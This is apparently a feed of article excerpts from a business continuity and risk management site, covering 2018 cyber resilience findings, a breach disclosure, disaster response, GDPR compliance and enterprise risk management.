In June 2018, the Business Continuity Institute published its fourth annual Cyber Resilience report, and for the first time this shows that cyber attacks are the number one threat to business continuity. With the top three type of attacks all targeted to compromise the integrity of data, this shift in threat means that the investment in traditional high availability infrastructure no longer addresses the number one business continuity threat. High availability, through replication and clustering of systems, simply spreads the compromise as encrypted or corrupted data is propagated by the infrastructure itself. Public cloud services like Office 365 and Google Apps, that are primarily built for high availability also don’t protect client data against the foremost cyber attacks, as they possess many of the same characteristics as a replicated private cloud infrastructure.



Consumer facing businesses are in the front line, but throughout organizational supply chains the pressure for product deliveries to be made as quickly as possible is increasing inexorably. Craig Summers looks at the issues.

There is a lot of talk in the market about driver shortages, decreased timelines and increased regulation. As if this isn’t enough these challenges are further impacted by a period of economic expansion and increased demand. And to top it off we have customers pushing us for ‘here’ and ‘now’.

The pressure is on, never before has an optimum transportation management system (TMS) strategy been so important.

Yesterday, a vague two-week delivery date was all the rage: that was the way it worked and we all accepted it.

Today, we want 24-hours, we demand a one-hour time slot and we expect it to show up without fail whilst being informed every step of the way; we are way more demanding than yester year.

Tomorrow: just imagine what our demands will be!

That’s the customer perspective, the question is: Has your transportation strategy kept up with consumer expectations? Does your supply chain facilitate these delivery expectations? Are you able to get your inventory distributed efficiently between supplier and warehouse, warehouse and store, all nodes and the consumer?



(TNS) — For the military, including Rim of the Pacific exercise participants, there’s a whole lot of emergency, disaster response and mass casualty practice going on this week.

Three hundred volunteers will portray patients from an earthquake and tsunami who will be triaged in mobile hospital units on Ford Island and transported by helicopter, ambulance and ambulance bus to hospitals on six islands.

Twenty-seven Hawaii hospitals are participating, officials said.

“For the first time, all of the acute care hospitals in the state are participating in the RIMPAC (humanitarian assistance and disaster relief practice),” the Navy said in a release.



Some things are naturally tough to measure, but if you can figure out a way to do it that is meaningful and consistent, it can give you a real a leg up in improving your performance in that area.

This is definitely the case with crisis management.

The things that matter most in effective crisis response can be tough to quantify, but there are ways of putting number values on those areas that can yield meaningful insights into your readiness.

Such metrics can help your organization identify the strengths, weaknesses, and opportunities of its crisis management posture. They can also help you in creating an optimally performing crisis management team, which is the key to helping you minimize the negative impacts of an emergency.

In today’s post, I am going to share with you the four metrics that I think every organization should gather and track if they want to be capable of responding effectively in a crisis. At the end, I’ll explain how you can leverage this data to improve your organization’s crisis management program.




Digital transformation is knocking at every company’s door. Cloud enabled ERP has the potential to create a tectonic shift in the way companies operate. There is finally an end in sight to multi-million-dollar ERP implementations that span years, and require armies of technical consultants to endure months of design, develop, test cycles.

A couple of big question still vex IT leaders and managers:

  • Is my business ready for the cloud?
  • How do I select the right cloud ERP?

To answer the first question, companies should conduct a detailed digital readiness assessment to evaluate if business leaders, process owners, and IT groups are ready to take advantage of digital capabilities in the market place.

The rest of this blog will focus on how to select the right cloud ERP.



Reimagining Risk

A recent Deloitte poll surveyed nearly 2,400 professionals in a bid to better understand third-party or extended enterprise risk management (EERM) programs and explore how enhanced management of these programs can drive value for an organization. Deloitte’s Dan Kinsella explains why executives should reimagine EERM for value creation.

The benefits related to expanding a company’s capabilities beyond the traditional four walls of an organization are too big to ignore, but many executives see challenges in managing the third-party risk involved. Unfortunately, these challenges can obscure the perceived value in expanding the enterprise and test the resolve of decision-makers who want to make it happen.

That’s the thrust of the poll, which surveyed professionals across a range of industries, including banking and securities, technology, investment management, travel, hospitality and services, insurance and other sectors. A mere 3.9 percent of respondents in the survey defined their EERM efforts as “optimized.”

That means a small fraction of organizations have matured EERM to the point of having an integrated strategy and decision-making, continuous improvement and investment, executive champions and highly customized decision support tools with external data. In constructing our poll, we positioned these as some of the key attributes necessary to mature EERM programs and create value. In developing these attributes, organizations can better streamline with improved confidence the management of third parties. So why do so few companies have these attributes in place to do EERM well?


(TNS) — FORT LAUDERDALE, Fla. — When 911 callers reported gunfire at Marjory Stoneman Douglas High School in Parkland on Feb. 14, operators in Coral Springs relayed their information to a regional dispatch center, a process that might have caused fatal delays in the law enforcement response.

The two-step reporting system resulted from Coral Springs’ decision to remain outside a 2013 consolidation of 911 service in Broward County. Parkland relies on Coral Springs for 911 services and the Sheriff’s Office for law enforcement.

“What happened in Parkland was that every single cellular 911 call made from Marjory Stoneman Douglas High School, every kid in that school, everybody in Parkland that was calling 911 to report information, was that it was going to the Coral Springs communications center,” said Pinellas County Sheriff Bob Gualtieri, chairman of the Marjory Stoneman Douglas High School Public Safety Commission.



The Resolverite Spotlight is a new series that highlights the inner workings of our workplace through the best people to tell our story: our Resolverites! 

This week, Resolver’s Talent Specialist Victoria Pearson sat down with Michael Perrotte, a Developer based in our Toronto office to learn more about what he does. 



Thursday, 12 July 2018 14:29

Resolverite Spotlight: Michael Perrotte

(TNS) — Every second counts during an emergency, especially when it comes to an emergency in a school.

That's why Laura Gasparis Vonfrolio, a former College of Staten Island (CSI) professor of nursing, came up with an idea to help teachers during a crisis.

The Teacher Alert System (TAS) is a wireless remote that provides direct connection to the police, firefighters, EMTs and the principal. It also includes a button to alert the school and police if there is an active shooter.

"As a college professor and registered nurse I became frustrated with the lack of resources available to our teachers," Vonfrolio said. "Why can't teachers who have the responsibility of teaching and caring for our most precious possessions — our children — have a better way to summon help?"

The wireless unit connects to the base using Bluetooth, which connects to Wi-Fi, cellular or satellite.



People in business continuity talk a lot about black swans: unexpected events that come from outside normal experience and have strongly negative effects.

Black swan events are definitely worth thinking about and being prepared for due to their potentially catastrophic impacts.

However, in today’s post, we are going to talk about the opposite of black swan events. Some people refer to such events as white swans, but I am going to refer to them as “7 Bad Things That Are Likely to Happen This Week.”

These are negative events that I think actually have a high likelihood of happening to some organization somewhere in the coming week—or at any rate, they are things that happen fairly frequently, having a negative impact each time.

If one of these common business continuity threats happens to your organization, will you be ready?



(TNS) - Recovering from Hurricane Harvey doesn’t just mean rebuilding a home or finding a new job. Long after one’s physical recovery is complete, the signs of stress and trauma may remain.

Texans Recovering Together provides free, confidential crisis counseling and referral services to help survivors work through their disaster recovery, according to a news release Monday.

The program is run by the Texas Health and Human Services Commission and funded through grants from the Federal Emergency Management Agency totaling $13.9 million.

Crisis counseling providers work through home visits and community settings for Texans Recovering Together rather than conducting sessions in an office. Counselors and survivors can dial 211 to be referred to local providers.



When discussing solid state drives (SSDs), many people — even experts — use the terms "flash" and "SSD" interchangeably. It's an understandable linguistic choice because the two technologies are very closely related. However, the two terms don't refer to exactly the same thing.

The difference between the two might be easiest to understand with an analogy. And one of the most apt analogies that gets used in the storage industry is that flash is like eggs and an SSD is like an omelet. In the same way that an omelet is made mostly of eggs, an SSD is made mostly of flash. And if someone asked what you had for breakfast, it would be understandable if you answered "eggs," even if what you really had was an omelet.

Continuing the analogy, you can also do lots of things with eggs besides making omelets. In the same way, you can do lots of things with flash besides making SSDs.



(TNS) — As a ferocious hurricane bears down on South Florida, water managers desperately lower canals in anticipation of 4 feet of rain.

Everyone east of Dixie Highway is ordered evacuated, for fear of a menacing storm surge. Forecasters debate whether the storm will generate the 200 mph winds to achieve Category 6 status.

That is one scenario for hurricanes in a warmer world, a subject of fiendish complexity and considerable scientific research.

Some changes — such as the slowing of hurricanes’ forward motion and the worsening of storm surges from rising sea levels — are happening now. Other effects, such as their increase in strength, may have already begun but are difficult to detect, considering all of the other climate forces at work.



Early in the morning of 5th July 2018 the BCI became aware that we had become the subject of a targeted cyber-attack.

An attacker compromised account credentials and ultimately gained access to a single BCI email account. On discovering unauthorized access to the email account, we initiated our standard incident response process. We engaged outside specialists to assure ourselves, clients, and other stakeholders that the review was thorough and objective. The BCI took a variety of actions:

  • Immediately executed steps to stop and contain the attack.
  • Ascertained the size and scope of the attack. The team reviewed logs from the incident to understand what the attacker did in the email platform, and it used this information to guide its response to the attack.
  • Determined what the attacker targeted. The attacker targeted an email platform. This system is distinct and separate from other BCI platforms, including those that host client data, collaborative work among BCI professionals, engagement systems and other non-cloud based email systems. None of these were impacted. We know from the forensic review conducted by our own cyber professionals that the attacker was specifically focused on obtaining details of one particular client.
  • Reviewed materials targeted by the hacker. This incident involved unstructured data; namely, email. Through a detailed review of logs, the BCI was able to determine what the attacker actually did and that the number of email messages targeted by the attacker was a small fraction of those stored. We looked at all of the targeted email messages in a manual document-by-document review process, with careful assessment of the nature of the information contained in each email. By conducting this eyes- on review, we were able to determine the very few instances where there may have been active credentials, personal information, or other sensitive information that had an impact on clients.
  • Contacted impacted clients. The BCI contacted the single client impacted.
  • Alerted authorities. The BCI began contacting governmental authorities immediately.

The team determined that:

  • The attacker is no longer in the BCI’s system. The BCI has seen no signs of any subsequent activities. We have taken a number of important steps to remove the attacker’s access to our environment, including the blocking of IP addresses, disabling accounts, resetting passwords, and implementing enhanced monitoring.
  • No disruption occurred to client businesses, to the BCI's ability to serve clients, or to consumers.

The BCI remains deeply committed to ensuring that its cyber-security defences provide a high standard of protection, to investing heavily in protecting confidential information and to continually reviewing and enhancing cyber security.

Changing public health messaging to focus on the impact of actions rather than the outcomes of actions could have significant implications for how we deal with pandemic threats, according to a new study from City University of London, the Oxford Martin School (University of Oxford), and Yale University.

Uncertainty about how our choices will affect others is a common occurrence in our social lives, with previous research suggesting that such uncertainty leads to solely selfish decisions and actions. However, the new study found for the first time that uncertain situations do not always lead to selfish behaviour. Appealing to people to think about the impact of such potentially harmful actions can lead to decisions which err on the side of caution. The paper is published in Nature Human Behaviour.

When it comes to social decisions, the uncertainty we face can be split into two types, known as outcome uncertainty (i.e. uncertainty about the outcomes of decisions) and impact uncertainty (i.e. how an outcome will impact another person).



4 Key Criteria to Consider When Evaluating Solutions

The EU General Data Protection Regulation is now officially in effect. If your organization transacts with individuals and businesses on a global scale and is looking to implement e-signatures, ensure the solutions on your shortlist are able to demonstrate full compliance with the GDPR requirements. Here are four key criteria to consider.

The European Union’s (EU) new landmark privacy law called the General Data Protection Regulation (GDPR) [Regulation (EU) 2016/679] is now officially in effect. The GDPR expands the privacy rights of EU individuals and places new obligations on organizations that market, track or handle EU personal data. The rise of technologies such as the cloud and social media has changed the privacy landscape for good, and the EU’s updated data privacy standard takes into account the implications of these new technologies on personal data. The good news is that unlike its predecessor, the Data Protection Directive 95/46/EC that introduced administrative burdens and a fragmented legal framework, the GDPR is a single law and applies unilaterally across the EU as of May 25, 2018.

All companies that process and hold the personal data of individuals residing in the EU must comply with the GDPR, regardless of company location. This includes e-signature providers that help organizations around the world automate and digitize their manual, paper-based processes. E-signature solutions manage and process documents that may include personal data, therefore it is important that they ensure adequate privacy protection and empower citizens the right to access their personal data. If your organization transacts with individuals and businesses on a global scale and is looking to implement e-signatures, ensure the solutions on your shortlist are able to demonstrate full compliance with the GDPR requirements.



Tuesday, 10 July 2018 15:13

How The GDPR Will Impact E-Signatures

One of the biggest challenges businesses face today is making informed decisions on how to transform their IT organizations from legacy data centers into the required hybrid IT infrastructures of tomorrow.

To help them, the newest Gartner Magic Quadrant1 (MQ) assessed 20 IT vendors in the market, positioning them based on completeness of vision and ability to execute.

The Data Center Outsourcing/Hybrid Infrastructure Managed Services (DCO/HIMS) Magic Quadrants for North America and Europe, issued June 18, evaluate service providers’ ability to deliver data center managed services (DCMSs). This includes DCO, HIMS, private cloud managed services, mainframe managed services, ERP hosting managed services, data center transformation, cloud migration services, edge DCMSs, remote infrastructure management and IUS (Infrastructure Utility Services).

This year, Sungard Availability Services (Sungard AS) is positioned as a Challenger in North America.



(TNS) - The morning of Sept. 12, Nick and Bonita Colbert hiked up Flagler Estates Boulevard, through thigh-high waters and carrying an empty cooler between them with their sandals stacked on top.

"It will take days for this to go down," said Hal Baughman as he surveyed the flooding.

Baughman, a friend of the Colberts, had driven down to the edge of the water to give them a lift out to a local convenience store so they could grab more supplies.

As the couple made it to dry ground, they stopped to talk a little about what they experienced riding out Hurricane Irma on a family member's property.



And What You Can Do About It


With Audi’s CEO arrested for fraud, it’s time to shine the spotlight on corporate governance. Inexperienced leaders, confusion over the role of governance and a lack of commitment means that time and time again, we see the same mistakes made by companies across all industries. This article shares three mistakes companies make when managing corporate governance and how to overcome them.   

With the feedback we are seeing from the Global Governance, Risk and Compliance Trends Report 2018, more leadership teams are engaging with governance, risk and compliance than ever. The survey of more than 200 GRC professionals found 53 percent said leadership is engaged – an increase of 15 percent in the past year.

Why is a good corporate governance so critical for a successful business? For a start, businesses with highly advanced corporate governance spend considerably less on fixing mistakes, but they are also able to adapt faster, and they have a much better rate of employee retention.

Here are three reasons your business is failing at corporate governance and what you can do about it.



The populations of most world cities are growing fast, and with it come challenges and opportunities for keeping citizens safe and well. New International Standards for measuring and improving the performance of cities have just been published to help cities keep on top of the game.

Already, more than half of the world’s population lives in a city and that number is to grow to nearly 70 % by 20501). Keeping up with rising urbanization and the stress it places on resources and infrastructure poses a serious challenge for cities everywhere, creating the need for effective planning, management and evidence-based policy making.

In order to make such decisions, cities need a reliable reference for measuring their performance, which is where the world’s first International Standard for city indicators comes into play.

ISO 37120 (Indicators for city services and quality of life in communities) was the first set of internationally standardized city indicators that provide a uniform approach to what is measured and how, when it was first published in 2014. For the first time, cities were able to communicate amongst themselves using globally standardized, comparable data, allowing them to get insights into other cities and learn from each other like never before.

Now, the standard has just been updated, offering even more indicators to help cities effectively improve the quality of life of their citizens and plan for a more sustainable future.



Wildfires are destructive for obvious reasons and for some that aren’t as obvious: They can and do contaminate water supplies.

A recent report, co-authored by Fernando Rosario-Ortiz, associate professor at the University of Colorado’s Department of Civil, Environmental and Architectural Engineering, sheds some light on what is becoming acknowledged as a serious issue with more intense and numerous wildfires.

Many drinking water utilities get their water from forested watersheds, where wildfires are increasing and posing threats to the water supply.

Wildfires causing mudslides and sediment mobilization is common and widely acknowledged because of the imagery of homes and roads being destroyed. But the less visible and, thus, maybe less acknowledged, is water supply contamination.



Wildfire season is here and businesses have a lot at stake. The far-reaching impact of wildfires on business is astounding, but there are proactive steps a company can take.

The Devastation of Wildfires

In the hot, dry summer months, people have more to worry about than a sunburn. Wildfires can break out at any moment, putting homes and businesses at risk. Whether from a lightning strike, a fallen electrical pole, a cigarette, or a campfire; a single spark can quickly turn into a massive wildfire that can cause irreparable damage.

According to NOAA, in 2017 the U.S. experienced 66,131 fires, the seventh most wildfires on record. The impacts of these fires was catastrophic, burning 9,781,062 acres of land, the third-most ever recorded. This averaged 147.0 acres per fire.

Fighting these fires consumes massive amounts of resources. Reuters reported the 2017 U.S. wildfire season cost more than $2 billion in efforts alone, but that didn’t include the total cost of the 2017 California wildfires which topped $180 billion. The fires caused widespread damage, destroying land, buildings, homes, transportation routes, wildlife, and agriculture, not to mention killing and injuring many people.



Given the title of this blog, you might wonder why a consultant whose focus is technology recovery would advise you not to rely on technology to keep your business running during a crisis. The reason is, our business technology is similar to the cars we drive: Most of the time, they work well and provide great convenience, but every now and then they get a flat tire or break down. Most of us have backup plans to deal with this eventuality, such as membership in an auto club that provides roadside rescue. In the same way, we need workarounds to help us keep things going when our business technology goes down.

At MHA, one question we routinely ask when conducting a business impact analysis (BIA) is whether the client has devised manual workarounds for whatever application or automated process we are looking at. In other words, could the operation continue if the technology were to go down? Very often the answer is “no.” There are no workarounds, and if the technology went down the operation would grind to a halt.



When you’re completing a jigsaw puzzle, it is a lot easier to grasp how the pieces fit together if you have a picture of the completed puzzle to go by.

By the same token, it would be easier for an organization to implement a program to manage operational risk if it had access to an overview of just what such a program would look like.

In today’s post, I am going to provide just such an overview, in the form of a high-level description of the Operational Risk Management (ORM) lifecycle.

I hope this nudges your organization toward considering implementing a program to manage operational risk, if you do not have one already.

Before we begin, here are a few basics about operational risk, in case the topic is new to you or you need to refresh your memory.



Management systems help organizations achieve their objectives, and auditing them makes good business sense. The International Standard for auditing management systems has just been updated, giving more guidance than ever before. 

Management system standards are growing in popularity as organizations see how they can be applied to manage interrelated processes to achieve their objectives. From quality or energy management to food or traffic safety, the list of standards aimed at helping organizations put in place effective management systems is getting long.

ISO alone has over 70 management system standards, building on international expertise and best practice to help organizations perform better, save money and develop a competitive edge.

In order to get the best out of a management system and ensure continuous improvement, regular auditing needs to take place. Not an easy task if, like most organizations, you have several management systems in place.



This series is dedicated to providing direction for applying Project Management principles to starting a Business Continuity or Disaster Recovery (BC/DR) Program.  This is the first installment of a multi-part series.  In this installment we will focus on the Project Initiation phase.  Subsequent segments will be aimed at additional phases of starting a BC/DR Program, on improving an existing BC/DR Program, and on elevating a mature program to a new level of efficiency and effectiveness.

Starting a Business Continuity Program

Launching a BC/DRBC/DR Program requires its own plan.  This is not a plan as in a recovery or response plan, but a plan in the sense of a project plan.  Starting a BC/DR is no different than starting any project, and success essentially hinges on your project management skills.  You may want to reach out to the Project Management Office (PMO) if you are fortunate enough to be part of an organization that has one.  The PMO may be able to provide an experienced project manager who can assist by applying current project management theory and techniques to the initiative.  If your organization does not have a PMO, or a resource is not available, then gaining a basic understanding of project management is the starting point.

There are many available information sources for project management principles.  The Project Management Institute (PMI) http://www.pmi.org/ is the leading authority in the field.  The PMI offers training and certification and most community colleges and universities offer courses in project management.



(TNS) — You never think it will happen to you.

You’ve gone to school or a festival, concert venue or shopping mall for years and have never had any concerns. Then, one day, gunshots ring out, and they seem to be getting closer and closer.

Quick thinking and being prepared can make the difference between being a survivor or victim — for you, your family, friends or others, local health and emergency personnel said.

“The reality is it can happen anywhere,” Dr. Deborah McMahan, health commissioner for the Fort Wayne-Allen County Department of Health, said Friday, referring to the shooting a day earlier that left five people dead in the newsroom of the Capital Gazette newspaper in Annapolis, Md.

McMahan was speaking Friday at a previously scheduled information session for media about how to react in an active-shooter situation and how to help stop the bleeding of people who have been wounded.

The goal of the demonstration is to get the information to you — the public — so you can be prepared to save your life or the lives of others.



In a typical year, the U.S. experiences 12 named storms, six hurricanes, and three major hurricanes.

“Typical,” however, doesn’t describe our last season.

In 2017, there were 17 named storms, 10 hurricanes, and six major hurricanes. The NOAA attributes the irregularity on “the lack of El Niño conditions in the equatorial Pacific, with La Niña conditions developing near the end of the season.”

Experts don’t expect the 2018 season to fare much better.

Companies in the danger zone are reasonably on edge and the rest of the country should be equally concerned. While coastal areas are in the bullseye, states nationwide feel the economic impact of hurricanes.



By Phil Klotzbach, lead author of the Colorado State University (CSU) hurricane forecasting team, and I.I.I. non-resident scholar. 

Colorado State University (CSU) released its updated outlook for the 2018 Atlantic hurricane season today, and they are now calling for a below-normal season with a total of 11 named storms (including Alberto which formed in May), four hurricanes and one major hurricane (maximum sustained winds of 111 miles per hour or greater; Category 3-5 on the Saffir-Simpson Wind Scale) (Figure 1).  This prediction is a considerable reduction from their June outlook which called for 14 named storms, six hurricanes and two major hurricanes.  Accumulated Cyclone Energy (ACE) and Net Tropical Cyclone (NTC) activity are integrated metrics that take into account the frequency, intensity and duration of storms.



Tuesday, 03 July 2018 16:23


Using Tech to Streamline Compliance Efforts

Data collection and monitoring tools now make it easier to access information quickly, but only if your company has the right content management and e-communications system in place. Rather than leaving the decision as to what system would work best solely up to the IT department, compliance officers should have a say in the functionality of such systems, given the time and resources involved in following compliance protocols and e-discovery searches arising from compliance audits, internal investigations and regulatory investigations.

When the alarm goes off, your general counsel and regulatory compliance team puts the IT department on high alert: find all institutional content related to a specific issue or event, and find it fast.

Perhaps the request is in response to a claim alleging a product defect, with all documents related to product design and testing needing to be collected, including blueprints, design specs, patent applications, emails and texts between designers and outside contractors and subcontractors, as well as beta testing results. Or the request relates to alleged insider trading, employee harassment, illegal payments to a foreign partner or leaking of clinical trial results.

When these requests come to an IT department, resources must be pulled from other projects and the team has to search the company’s cloud or network of files, and in some cases, depending on where information was saved, obtain laptops from their users so individual hard drives can be reviewed. The team also might need to recall where deleted emails are stored, identify the search parameters to gather the relevant ones and determine what to do with data from users who have left the firm or work from overseas offices, which may have conflicting privacy and e-discovery rules governing the accessing and downloading of information. And perhaps more challenging is that IT staff may suddenly be exposed to sensitive, confidential information, if only to capture and manage it.



Monday, 02 July 2018 16:19

The Data Collection 'Fire Drill'

Surefire Tips to a Speedy Exit

Plenty of paths lead to firing, and lackluster (or even poor) performance isn’t the fastest by any means. Linda Henman outlines some of the more egregious ways you can bring about a quick end to a good job.

Almost every year, a senior person in one of my client companies gets fired. Sometimes I’m surprised to learn of the firing, but, more often, I’d spotted troubling behavior years before.

When the leaders or board directors must fire a senior person, the company suffers financially — often to the tune of a million dollars, but one recent fire cost the company $50 million. When these firings occur, investors and donors lose confidence, morale plummets and the company’s reputation deteriorates.

The following list represents actual people and real cases — people who seemingly wanted to get fired. Here’s the advice they apparently followed:



Monday, 02 July 2018 16:17

The 10 Best Ways To Get Yourself Fired

Unlike other essential utilities, water supply is often overlooked by UK business continuity managers because it is frequently viewed as a supplier responsibility. Many organizations are not aware that non-household customers should arrange and maintain their own contingency plans especially when they are considered a ‘sensitive’ or ‘water critical’ site.

In this article, Sven Parris, senior sales & marketing manager at Water Direct, talks about water contingency planning for UK businesses and organizations and the importance of improving resilience and raising the profile of water as a critical business continuity theme.

In April 2017, the water market changed, meaning non-household customers can now choose their water provider, creating an open market for new water retailers. Water wholesalers still manage the infrastructure: supply, pipes and sewage works, while the newly established retailers manage the customer service, billing and value-added services. This has introduced new opportunities for competitive pricing, collated billing for multi-site businesses and new value-added services designed to differentiate the suppliers. The change in the market has also brought to the surface the importance of these business customers having their own contingency plans for water supply.



Business continuity has a defined role with cyber resilience strategies, and it has become intertwined with cyber security for threats requiring coordinated responses across organizations’ departments.

This is one of the key findings of the 2018 Cyber Resilience Report, published today by the Business Continuity Institute, in collaboration with Sungard Availability Services.

Since the first publication of this report we have witnessed an increase in the number of cyber-attacks and the development of new cyber threats with the potential to cause major damages to organizations, including severe financial and reputational impacts at a scale that threaten their very existence.

The financial cost of cyber-attacks is growing. This is not a surprising result after the events that occurred last year, where large-scale cyber-attacks cost organizations worldwide millions of euros. Reputational damages are also of major concern, 66% of respondents consider reputational damage as the most concerning trend when it comes to cyber security incidents.

Moreover, cyber security incidents cannot be considered exclusively non-physical incidents anymore. 46% of respondents consider cyber-attacks with physical security consequences as one of the concerning trends.

The cyber threat landscape today is highly complex and rapidly changing and it has become clear that business continuity plays a key role in responding to an incident and ensuring that the organization is able to manage any disruption and prevent it from becoming a crisis.

According to this year’s results, business continuity remains key to building cyber resilience and there is the need for it to collaborate with cyber/information security departments to improve the way organizations deal with disruptions caused by cyber security incidents.

David Thorp, Executive Director at the BCI, commented: “The best way to protect organizations from one of the greatest threats of our times is to invest in people and preparedness. Investing in training and collaborative strategies should be at the heart of any plans aimed at mitigating cyber- attacks and ensuring a fast recovery.”

The 2018 BCI Cyber Resilience Report is now available for download. Log-in into your profile and visit the knowledge library.


Enterprise risk management is often criticized as being remote from the real strategic needs of the organization. Is this fair comment and, if so, what can be changed to make ERM more relevant? Peadar Duffy gives his viewpoint.

I recently spent a couple of hours talking with the senior independent director of a major FTSE. He opined that in his experience, risk management consistently fails to deliver value. It is led by people who are more administrators than leaders, and more bureaucrats than doers. The director in question has himself been a spectacularly successful CXO in a number of significant organizations.

Around the same time another senior executive with impressive credentials remarked that in his experience 'risk has been done to him' by folk in risk management. He speaks of the parallel universes of the operational front lines, risk support, and audit. Whereas the theory and rationale (three lines of defence) is sound, the method of execution is often sub-optimal, and sometimes even counter-productive.

I am sympathetic to these perspectives, as I think that whilst harsh, they are representative of generally held opinions of many in both front line decision making, and strategic leadership positions.



Earlier in June ISO published ISO 22330, its latest business continuity standard. In this article, Dr Liz Royle explains what the new standard is, why it was needed, and what it contains.

A fire has ripped through the building. Although most people were successfully evacuated and sheltered, some remain unaccounted for and there may be fatalities. In the ensuing hours, people are shocked and distressed, rumours are rife about the cause and impact of the fire and the management team is working flat out to respond. Would you be ready to effectively manage the people aspects of this event?

It’s in everyone’s interests for the organization to recover quickly and its people are at the heart of this. However, it’s no good having arrangements for relocating operations if the people sitting in those alternative worksites are not able to function as usual, are emotionally distressed or angry about how the organization dealt with them, their families or their colleagues.

People may become negatively impacted by a wide variety of work-based incidents – fire, natural disaster, cyber-attacks, workplace violence or acts of terror commonly spring to mind. The event may affect the whole organization, a department, team or a few individuals. However, when it comes to managing the people aspects, there are basic principles that apply whatever the causal event or however many people we are managing. The long-awaited ISO 22330 ‘Guidelines for people aspects of business continuity’ was published at the beginning of June so this article offers a ‘hot off the press’ review and some ideas of how and why you might use it.



Few things embody the task of balancing risk and reward like a manned space rocket sitting on the launchpad as the moment of liftoff approaches. Such a rocket brings together in one time and place all the hopes and objectives for the mission as well as all the risks it carries—risks which, as history shows, are very real.

I always felt a special rooting interest in NASA’s manned space missions because my brother works for the space agency. He’s a fire chief at NASA’s White Sands Test Facility in New Mexico.

But if NASA is an especially good example of the need to balance risk and reward in carrying out a mission, it is not the only organization in that position. Every serious organization is in that situation. All are striving to achieve certain goals in an environment filled with potential dangers, whether caused by nature, technology, or human beings.

The discipline of balancing the potential rewards of an activity against the risks it brings is known as Enterprise Risk Management (ERM).



As you know, a leading trend of the past several years is organizations’ hiring third-party vendors to provide services that they previously performed in-house.

At MHA, we are familiar with this trend from helping our clients grapple with the ramifications of it from a business continuity (BC) point of view.

There are many reasons for the increasing turn to outside vendors. Mostly it comes down to businesses’ desire to outsource tasks not central to their core skillset so they can focus on those that are.

For most companies, such outsourcing has been found to reduce expenses, increase flexibility, and heighten service quality—while permitting the organization to maintain a laser focus on what they do best (and what is most profitable).



For the second year in a row, AlertMedia has been named one of the Best Places to Work by the Austin Business Journal. Last year, we finished in 5th Place in the Small Business category. After a year of rapid growth and increased fundraising, we moved to the Medium category this year, where we were named the 3rd best workplace for 2018!

The award recognizes the top workplaces in Austin across many industries—from technology to real estate to education. The rankings are based on confidential feedback from employees across several dimensions, including communication, resources, manager effectiveness, personal engagement, team dynamics, and trust in leadership.



When shopping for mass notification systems, there are more options than most people realize, and it can be time-consuming to vet them all.

By identifying the basic features you need in a good notification system, you can go into the process with a clear vision of your goals.  Read on for a buyer’s guide to finding the best mass notification solution for your agency.

Best for the Community

Your end goal with a mass notification system is to be able to protect your community. So it only makes sense to start by thinking about your most important audience – the people out there who need information in an emergency.

Will they need all the bells and whistles that are featured in some emergency notification systems? Do other organizations in the community already provide some high-quality notifications for emergencies? Can you successfully implement a notification solution that only includes basic functions?



Over the years I’ve heard the same question, “What do you want to do with your life?” When I was younger, I always responded quickly, “I want to be an Astronaut.” Or, “I want to be a Movie Star.”

Now when you ask me that question, I will respond with, “I have absolutely no idea.”

My name is Angela Prass. I will be a Junior at Syracuse University this fall studying Information Management and Technology. Recently, I received an internship opportunity at BC in the Cloud, along with two other talented individuals.

Along my long journey in college of not knowing what to do for the rest of my life, I stumbled upon a class titled, “Enterprise Risk Management.” I received a good grade in this class and wanted to explore this concept on a real-world scale. I thought to myself, “I like to take risks. This is something I’d be interested in.”



Do you know how, in your non-business life, there is a difference between “friends” and “Facebook friends”?

There is something similar in business continuity when it comes to third-party vendors.

Your organization might purchase goods and services from 500 outside companies, but how many of these do you really depend on? How many are vital to your company’s ability to carry out its core mission?

If your organization is like most I work with, the answer might be about a dozen.

Can you guess why I’m mentioning this, or why it matters?

Of the main business continuity dimensions, one is by far the most neglected. Do you know which one?

If you answered Program Administration, Crisis Management, IT Disaster Recovery, Business Recovery, or Fire and Life Safety, you’re wrong, I’m sorry to say.



A national survey of more than 1,127 adults found that slightly more than half (51 percent) believed it was very likely or somewhat likely that a disaster could impact them in the next five years, but most (53 percent) indicated they don’t have emergency plans in place and couldn’t go more than just a few days without medication.

The survey was the third annual for Healthcare Ready, which was established after Hurricane Katrina by trade associations composed of the bio-pharmaceutical supply chain and the American Red Cross.

“It shocked me that we saw half of the respondents say that they thought a catastrophe could impact their community in the next five years,” said Healthcare Ready Executive Director Nicolette Louissaint. “But the preparedness numbers have not shifted significantly in the last three years since we’ve been doing the poll.”



How to Achieve Compliance

Greg Sparrow addresses the issues of the General Data Protection Regulation (GDPR) and preventative actions that must be taken to ensure organizational compliance. Through a “GDPR Readiness Survey” sponsored by CompliancePoint, Greg touches on the research findings and draws probability conclusions.

The General Data Protection Regulation (GDPR) is an EU-based regulation that requires businesses to protect the personal data and the privacy of any European Union natural persons when transactions occur within EU states. Data protected under the GDPR includes identifiable information (names, addresses, dates of births), web-based data, health and genetic data and biometric data. These bylaws were officially enforceable as of May 25, 2018 and apply to all businesses interacting and performing marketing tasks to EU data subjects. The GDPR is based on the precedent that private information always is, or should be, private and that individuals have rights surrounding that data. The exact words according to the GDPR are that “data protection is a fundamental right.”

Despite a two-year grace window that companies were allotted to prepare for GDPR compliance when the regulation was first approved in 2016, a recent survey study titled “GDPR Readiness Survey” shows that very few are 100 percent compliant. The survey found that only 29 percent of the participants were actually aware of the GDPR, 44 percent said they were somewhat aware and 29 percent said they were completely unaware. The survey also found that only 24 percent of businesses felt that they were prepared for the GDPR, and 31 percent felt they were somewhat prepared. This is compared to the 36 percent of business that said they did not feel prepared and another 9 percent that said they were unsure. These numbers seem to be alarming simply due to the fact that one infraction can cost a noncompliant business millions in revenue. It can be assumed that companies who are not fully aware or fully prepared face enormous risk when working with any customers who may be based in the EU.



(TNS) - The approach to wildfire suppression in Kansas suffers from leadership fragmentation and the lack of financial resources and personnel to effectively coordinate response to massive blazes churning across the prairie, a legislative audit said Wednesday.

The examination was ordered after Kansas suffered record wildfires in 2016 and 2017 that burned a total of 800,000 acres, caused $80 million in damage, destroyed 6,000 miles of fencing, and killed one person and about 5,000 cattle.

Andy Brienzo, an auditor with the Kansas Legislature's auditing division, said the state's program to control wildfires generally fell short of centralized operations in Texas and three other states. He said Kansas' operation was inadequate to meet demand for emergency services, and this shortfall meant local government was compelled to absorb more of the cost than in comparable states.



(TNS) - As temperatures creep into the upper 90s and it feels like it is 110 outside, many are retreating to the indoors, but others have to bear the heat for their work.

Emergency responders are on the front line to help people. To do that job, some of them carry up to 60 pounds of equipment during extreme temperatures.

